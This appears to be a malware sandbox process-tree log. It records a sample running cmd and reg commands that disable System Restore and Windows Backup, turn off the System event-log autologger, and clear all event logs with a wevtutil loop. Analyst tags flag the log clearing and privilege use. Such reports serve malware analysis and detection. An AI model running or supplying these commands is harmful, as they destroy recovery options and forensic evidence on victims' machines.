C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵
-
[depth 3] C:\Windows\system32\reg.exe: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
- [depth 2] C:\Windows\system32\cmd.exe: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
- [depth 3] C:\Windows\system32\reg.exe: reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
- [depth 2] C:\Windows\system32\cmd.exe: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
- [depth 3] C:\Windows\system32\reg.exe: reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
- [depth 2] C:\Windows\system32\cmd.exe: C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
- [depth 3] C:\Windows\system32\cmd.exe: C:\Windows\system32\cmd.exe /c wevtutil.exe el
- [depth 4] C:\Windows\system32\wevtutil.exe: wevtutil.exe el
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Analytic"
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Application"
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "DebugChannel"
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "DirectShowFilterGraph"
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "DirectShowPluginControl"
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Els_Hyphenation/Analytic"
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "EndpointMapper"
  - Suspicious use of AdjustPrivilegeToken
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "ForwardedEvents"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "HardwareEvents"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Internet Explorer"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Key Management Service"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Media Center"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "MediaFoundationDeviceProxy"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "MediaFoundationPerformance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "MediaFoundationPipeline"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "MediaFoundationPlatform"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-IE/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Backup"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-Help/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
  - Clears Windows event logs
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
- [depth 3] C:\Windows\system32\wevtutil.exe: wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
